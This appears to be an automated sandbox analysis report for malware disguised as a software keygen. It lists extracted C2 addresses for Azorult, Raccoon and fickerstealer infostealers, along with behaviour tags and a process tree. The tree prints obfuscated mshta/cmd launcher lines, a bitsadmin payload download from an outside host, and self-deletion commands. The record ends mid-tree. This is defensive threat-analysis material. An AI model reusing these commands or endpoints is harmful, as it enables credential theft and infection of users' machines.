Analysis

  • max time kernel
    1800s
  • max time network
    1790s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-04-2021 19:22

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 51 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 59 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:1040
    • C:\Users\Admin\AppData\Roaming\rdbgfjs
      C:\Users\Admin\AppData\Roaming\rdbgfjs
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:5760
    • C:\Users\Admin\AppData\Roaming\sgbgfjs
      C:\Users\Admin\AppData\Roaming\sgbgfjs
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:3124
      • C:\Users\Admin\AppData\Roaming\sgbgfjs
        C:\Users\Admin\AppData\Roaming\sgbgfjs
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:5952
    • C:\Users\Admin\AppData\Roaming\rdbgfjs
      C:\Users\Admin\AppData\Roaming\rdbgfjs
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3120
    • C:\Users\Admin\AppData\Roaming\sgbgfjs
      C:\Users\Admin\AppData\Roaming\sgbgfjs
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:4612
      • C:\Users\Admin\AppData\Roaming\sgbgfjs
        C:\Users\Admin\AppData\Roaming\sgbgfjs
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        PID:1524
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1000
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1204
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1164
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2692
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2672
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
            1⤵
            • Modifies Internet Explorer Phishing Filter
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4008
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4008 CREDAT:82945 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1096
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2596
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              PID:2812
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2380
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2364
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1852
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1416
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1396
                  • C:\Windows\System32\rundll32.exe
                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    1⤵
                      PID:1348
                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe
                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_serial_keys_gen_by_FFF.zip\Trepcad_6_6_00_serial_keys_gen_by_FFF.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:648
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2180
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                          keygen-pr.exe -p83fsase3Ge
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3152
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:392
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                              5⤵
                                PID:3600
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                            keygen-step-1.exe
                            3⤵
                            • Executes dropped EXE
                            PID:3116
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                            keygen-step-5.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4092
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1684
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "" == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3880
                                • C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
                                  MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:3632
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""/pkpxuxwmNl2s_EnQNC5XPVi2 "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                    7⤵
                                      PID:2000
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "/pkpxuxwmNl2s_EnQNC5XPVi2 " == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                        8⤵
                                          PID:4300
                                      • C:\Windows\SysWOW64\regsvr32.exe
                                        "C:\Windows\System32\regsvr32.exe" /U -S .\5VOMHR.c
                                        7⤵
                                        • Loads dropped DLL
                                        • Suspicious use of NtCreateThreadExHideFromDebugger
                                        PID:4568
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F -iM "keygen-step-5.exe"
                                      6⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1520
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                keygen-step-2.exe
                                3⤵
                                • Executes dropped EXE
                                • Modifies system certificate store
                                PID:2356
                                • C:\Users\Admin\AppData\Roaming\5F23.tmp.exe
                                  "C:\Users\Admin\AppData\Roaming\5F23.tmp.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:4744
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\5F23.tmp.exe"
                                    5⤵
                                      PID:4204
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        6⤵
                                        • Delays execution with timeout.exe
                                        PID:4916
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                    4⤵
                                      PID:4944
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                      4⤵
                                        PID:4956
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1
                                          5⤵
                                          • Runs ping.exe
                                          PID:5036
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                      keygen-step-3.exe
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:2216
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                        4⤵
                                          PID:4120
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 1.1.1.1 -n 1 -w 3000
                                            5⤵
                                            • Runs ping.exe
                                            PID:4612
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                        keygen-step-4.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Suspicious use of WriteProcessMemory
                                        PID:3272
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious use of SetWindowsHookEx
                                          • Suspicious use of WriteProcessMemory
                                          PID:2420
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                            5⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:3300
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2588
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4844
                                          • C:\Users\Admin\AppData\Local\Temp\is-CP9S4.tmp\Install.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-CP9S4.tmp\Install.tmp" /SL5="$6021A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:4892
                                            • C:\Users\Admin\AppData\Local\Temp\is-ER3CP.tmp\Ultra.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-ER3CP.tmp\Ultra.exe" /S /UID=burnerch1
                                              6⤵
                                              • Drops file in Drivers directory
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Drops file in Program Files directory
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5064
                                              • C:\Program Files\Windows Defender Advanced Threat Protection\XUIOMRCWGW\ultramediaburner.exe
                                                "C:\Program Files\Windows Defender Advanced Threat Protection\XUIOMRCWGW\ultramediaburner.exe" /VERYSILENT
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4200
                                                • C:\Users\Admin\AppData\Local\Temp\is-3KER3.tmp\ultramediaburner.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-3KER3.tmp\ultramediaburner.tmp" /SL5="$50374,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\XUIOMRCWGW\ultramediaburner.exe" /VERYSILENT
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:4280
                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:4464
                                              • C:\Users\Admin\AppData\Local\Temp\92-3cea9-8c3-78ab6-03e1b154af383\ZHapysolama.exe
                                                "C:\Users\Admin\AppData\Local\Temp\92-3cea9-8c3-78ab6-03e1b154af383\ZHapysolama.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1316
                                              • C:\Users\Admin\AppData\Local\Temp\a7-3baec-73f-dd3b2-0e9ee1960f1ac\Xopacinaqo.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a7-3baec-73f-dd3b2-0e9ee1960f1ac\Xopacinaqo.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4692
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kksskfoe.oqm\instEU.exe & exit
                                                  8⤵
                                                    PID:5012
                                                    • C:\Users\Admin\AppData\Local\Temp\kksskfoe.oqm\instEU.exe
                                                      C:\Users\Admin\AppData\Local\Temp\kksskfoe.oqm\instEU.exe
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:4160
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wkkxz5n2.5gw\md1_1eaf.exe & exit
                                                    8⤵
                                                      PID:5240
                                                      • C:\Users\Admin\AppData\Local\Temp\wkkxz5n2.5gw\md1_1eaf.exe
                                                        C:\Users\Admin\AppData\Local\Temp\wkkxz5n2.5gw\md1_1eaf.exe
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Checks whether UAC is enabled
                                                        PID:5408
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uowz0jrq.zso\google-game.exe & exit
                                                      8⤵
                                                        PID:5840
                                                        • C:\Users\Admin\AppData\Local\Temp\uowz0jrq.zso\google-game.exe
                                                          C:\Users\Admin\AppData\Local\Temp\uowz0jrq.zso\google-game.exe
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:6072
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                            10⤵
                                                            • Loads dropped DLL
                                                            PID:4876
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hzypkmc1.kde\y1.exe & exit
                                                        8⤵
                                                          PID:5676
                                                          • C:\Users\Admin\AppData\Local\Temp\hzypkmc1.kde\y1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\hzypkmc1.kde\y1.exe
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:5012
                                                            • C:\Users\Admin\AppData\Local\Temp\pEBTRNBeuL.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\pEBTRNBeuL.exe"
                                                              10⤵
                                                              • Executes dropped EXE
                                                              • Modifies system certificate store
                                                              PID:5924
                                                              • C:\Users\Admin\AppData\Roaming\1619206168880.exe
                                                                "C:\Users\Admin\AppData\Roaming\1619206168880.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619206168880.txt"
                                                                11⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                • Suspicious use of SetThreadContext
                                                                PID:4356
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\pEBTRNBeuL.exe"
                                                                11⤵
                                                                  PID:5192
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 127.0.0.1 -n 3
                                                                    12⤵
                                                                    • Runs ping.exe
                                                                    PID:5512
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\hzypkmc1.kde\y1.exe"
                                                                10⤵
                                                                  PID:216
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /T 10 /NOBREAK
                                                                    11⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:5236
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tg4ynmvo.g5e\inst.exe & exit
                                                              8⤵
                                                                PID:5800
                                                                • C:\Users\Admin\AppData\Local\Temp\tg4ynmvo.g5e\inst.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\tg4ynmvo.g5e\inst.exe
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  PID:6076
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n4x1rbfl.pch\SunLabsPlayer.exe /S & exit
                                                                8⤵
                                                                  PID:5108
                                                                  • C:\Users\Admin\AppData\Local\Temp\n4x1rbfl.pch\SunLabsPlayer.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\n4x1rbfl.pch\SunLabsPlayer.exe /S
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    PID:5416
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                      10⤵
                                                                        PID:5404
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                        10⤵
                                                                          PID:2176
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                          10⤵
                                                                            PID:5692
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                            10⤵
                                                                              PID:5844
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                              10⤵
                                                                                PID:6012
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                10⤵
                                                                                  PID:5620
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    11⤵
                                                                                      PID:4916
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                    10⤵
                                                                                    • Checks for any installed AV software in registry
                                                                                    PID:3112
                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                    10⤵
                                                                                    • Download via BitsAdmin
                                                                                    PID:4532
                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                    10⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Program Files directory
                                                                                    PID:5472
                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                    10⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5868
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                    10⤵
                                                                                      PID:2220
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                      10⤵
                                                                                        PID:5724
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                        10⤵
                                                                                          PID:6004
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                          10⤵
                                                                                            PID:4572
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                            10⤵
                                                                                              PID:2640
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                              10⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:1004
                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                                11⤵
                                                                                                • Loads dropped DLL
                                                                                                • Drops file in System32 directory
                                                                                                • Drops file in Program Files directory
                                                                                                PID:2316
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                              10⤵
                                                                                                PID:1976
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:5328
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                                  10⤵
                                                                                                    PID:3880
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                                    10⤵
                                                                                                      PID:5472
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDB3B.tmp\tempfile.ps1"
                                                                                                      10⤵
                                                                                                        PID:1384
                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
